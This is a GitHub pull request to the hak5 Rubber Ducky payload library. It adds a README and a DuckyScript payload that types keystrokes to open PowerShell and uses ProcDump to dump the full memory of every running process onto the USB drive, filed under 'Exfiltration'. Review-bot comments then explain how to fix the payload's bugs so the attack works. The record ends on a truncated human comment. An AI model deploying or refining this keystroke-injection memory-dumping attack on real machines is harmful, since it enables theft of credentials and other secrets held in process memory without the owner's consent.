Dump Windows Memory Through ProcDump #444
Open
aleff-github wants to merge 3 commits into hak5:master from aleff-github:patch-85
68 changes: 68 additions & 0 deletions
payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md
@@ -0,0 +1,68 @@ | ||
# Dump Windows Memory Through ProcDump | ||
|
||
This payload allows you to dump the RAM memory used by a running application by using the free software ProcDump. | ||
|
||
**Category**: Exfiltration | ||
|
||
## Table of Contents | ||
|
||
- [Dependencies](#dependencies) | ||
- [Description](#description) | ||
- [Yours TODO](#yours-todo) | ||
- [Read More](#read-more) | ||
- [Credits](#credits) | ||
|
||
## Dependencies | ||
|
||
* Authorization to execute powershell commands | ||
|
||
## Description | ||
|
||
This payload targets machines running Windows operating systems capable of executing commands via PowerShell. | ||
|
||
Its first action is to use the Rubber Ducky DETECT_READY\[3] extension to avoid unnecessary waiting times before the operating system is ready. | ||
|
||
Once the OS is active, the payload opens a PowerShell shell without administrator privileges and identifies the name assigned to the Rubber Ducky by combining Windows' Get-Volume and DriveLetter commands. | ||
|
||
Subsequently, to avoid requests for administrative permissions during the memory dumping operation with ProcDump, the payload directly moves to the Rubber Ducky, where it executes ProcDump, allowing the output to be stored directly on the USB drive without the need for additional permissions. | ||
|
||
To avoid potential complications related to exception handling during the execution of ProcDump, the payload uses the PID number instead of the process name. | ||
|
||
To obtain all active process PIDs the tasklist command is used, which provides this information comprehensively. | ||
|
||
## Yours TODO | ||
|
||
1. Download ProcDump\[5]. | ||
2. Move the extracted ProcDump folder or directly the executable, as you prefer, inside Rubber Ducky's memory. | ||
3. Then you have to change the variable `$WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`. | ||
4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `$PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`. | ||
|
||
## Read More | ||
|
||
- \[1] [ProcDump Documentation](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump) | ||
- \[2] [How to collect memory dumps using ProcDump](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB0253710) | ||
- \[3] [DETECT READY - SMARTER INITIAL DELAYS FOR KEYSTROKE INJECTION ATTACKS WITH THE USB RUBBER DUCKY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready) | ||
- \[4] [Physical Medium Exfiltration](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration) | ||
- \[5] [Download ProcDump for Windows target](https://download.sysinternals.com/files/Procdump.zip) | ||
|
||
## Credits | ||
|
||
<h2 align="center"> Aleff :octocat: </h2> | ||
<div align=center> | ||
<table> | ||
<tr> | ||
<td align="center" width="96"> | ||
<a href="https://github.com/aleff-github"> | ||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" /> | ||
</a> | ||
<br>Github | ||
</td> | ||
<td align="center" width="96"> | ||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/"> | ||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" /> | ||
</a> | ||
<br>Linkedin | ||
</td> | ||
</tr> | ||
</table> | ||
</div> |
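Review bot: step 3 of "Yours TODO" makes `procdump64a.exe` the default binary, but in the Sysinternals Procdump.zip that file is the ARM64 build; on the far more common x64 Windows targets the reader needs `procdump64.exe` (or the 32-bit `procdump.exe`), so the README should say which binary matches which architecture and default to `procdump64`. The Description also claims that writing the output to the USB drive removes the need for additional permissions, but the permission that matters is opening each target process: from a non-elevated shell ProcDump can only dump processes the current user owns, so Dependencies should state that services and other users' processes will fail with a ProcDump error. Smaller documentation points: `Get-Volume` exists only on Windows 8 / Server 2012 and later (Storage module) and belongs under Dependencies; the heading "Yours TODO" should read "Your TODO" with a matching `#your-todo` anchor in the Table of Contents; and step 4 should read "the path where it is stored".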
73 changes: 73 additions & 0 deletions
payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
@@ -0,0 +1,73 @@ | ||
REM ######################################################## | ||
REM # # | ||
REM # Title : Dump Windows Memory Through ProcDump # | ||
REM # Author : Aleff # | ||
REM # Version : 1.0 # | ||
REM # Category : Exfiltration # | ||
REM # Target : Windows # | ||
REM # # | ||
REM ######################################################## | ||
|
||
|
||
REM Requirements: | ||
REM - Authorization to execute powershell commands | ||
|
||
|
||
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe | ||
DEFINE $WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a | ||
|
||
REM Path to the EXE file stored in the usb, i.e. if 'F:\ProcDump\Procdump\procdump.exe' you must use '\ProcDump\Procdump\' | ||
DEFINE $PATH_TO_EXE \ProcDump\Procdump\ | ||
|
||
REM Driver Label of your RubberDucky - Default: DUCKY | ||
DEFINE #DUCKY_DRIVE_LABEL DUCKY | ||
|
||
|
||
EXTENSION DETECT_READY | ||
REM VERSION 1.1 | ||
REM AUTHOR: Korben | ||
|
||
REM_BLOCK DOCUMENTATION | ||
USAGE: | ||
Extension runs inline (here) | ||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic | ||
boot delay | ||
|
||
TARGETS: | ||
Any system that reflects CAPSLOCK will detect minimum required delay | ||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms | ||
END_REM | ||
|
||
REM CONFIGURATION: | ||
DEFINE #RESPONSE_DELAY 25 | ||
DEFINE #ITERATION_LIMIT 120 | ||
|
||
VAR $C = 0 | ||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) | ||
CAPSLOCK | ||
DELAY #RESPONSE_DELAY | ||
$C = ($C + 1) | ||
END_WHILE | ||
CAPSLOCK | ||
END_EXTENSION | ||
|
||
GUI r | ||
DELAY 2000 | ||
|
||
STRING powershell | ||
ENTER | ||
DELAY 2000 | ||
|
||
STRINGLN_POWERSHELL | ||
$m=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter; | ||
$m+=":"; | ||
cd "$m\\"; | ||
$a=tasklist /FI "Status eq Running" /FO LIST; | ||
foreach ($i in $a){ | ||
if ( $i -like '*PID*'){ | ||
$i -match 'PID.\s+(.+)'; | ||
".$PATH_TO_EXE$WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1]; | ||
} | ||
} | ||
exit; | ||
END_STRINGLN |
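Review bot: the invocation on the `".$PATH_TO_EXE$WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1];` line will not run: PowerShell parses a statement that starts with a quoted string in expression mode and rejects the following `-ma` token ("Unexpected token"), because a string is only treated as a command when it is invoked with the call operator, i.e. `& ".$PATH_TO_EXE$WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1];`. Two further points in the same block: ProcDump shows its EULA dialog on first use and blocks until it is dismissed unless `-accepteula` is passed, so without that flag the loop stalls on the first process; and `$i -match 'PID.\s+(.+)';` writes its True/False result to the console for every matching line, which should be suppressed (`$null = $i -match ...`) or folded into the `if`. On the DEFINE lines, `$WHAT_EXE_DO_YOU_WANT_TO_USE` and `$PATH_TO_EXE` carry the `$` prefix that DuckyScript reserves for `VAR` variables, while `#DUCKY_DRIVE_LABEL` correctly uses `#`; making all three `#` constants removes the ambiguity, and it matters here because the substitutions happen inside a STRINGLN_POWERSHELL block where `$` is also PowerShell's variable sigil. Finally, in `cd "$m\\";` the backslash is not an escape character in PowerShell double quotes, so the path ends in two backslashes and only works because Windows tolerates the doubled separator; `cd "$m\";` is what was meant.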
You need to use a `#` for define. `$` is used for variables. and